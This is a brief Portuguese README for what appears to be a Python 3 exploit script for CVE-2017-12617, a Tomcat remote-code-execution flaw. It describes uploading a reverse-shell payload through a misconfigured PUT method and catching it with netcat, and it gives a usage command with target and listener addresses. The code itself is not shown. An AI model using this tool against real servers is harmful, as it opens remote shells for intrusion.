
CVE-2017-12617 é uma vulnerabilidade crítica que leva à Execução Remota de Código (RCE) no Apache Tomcat.
CVE-2017-12617 é uma vulnerabilidade crítica que leva à Execução Remota de Código (RCE) no Apache Tomcat.
Esta vulnerabilidade funciona nas versões 9.0.0.M1 - 9.0.0, 8.5.0-8.5.22, 8.0.0.RC1 - 8.0.46, 7.0.0 - 7.0.81.
Testada apenas na 8.0.24. A vulnerabilidade usa a opção PUT mal configurada na aplicação ou na própria instância do Tomcat.
Ela usa PUT para enviar um payload de reverse shell ao servidor e executá-lo, enquanto escuta com netcat.
Como existem muitas versões do mesmo exploit na Internet, mas baseadas em python2, eu o reescrevi para funcionar com Python 3.
Divirta-se.
Exemplo de uso:
python3 cve-2017-12617.py -t 127.0.0.1 -p 8888 -l 192.168.1.118 -P 5555
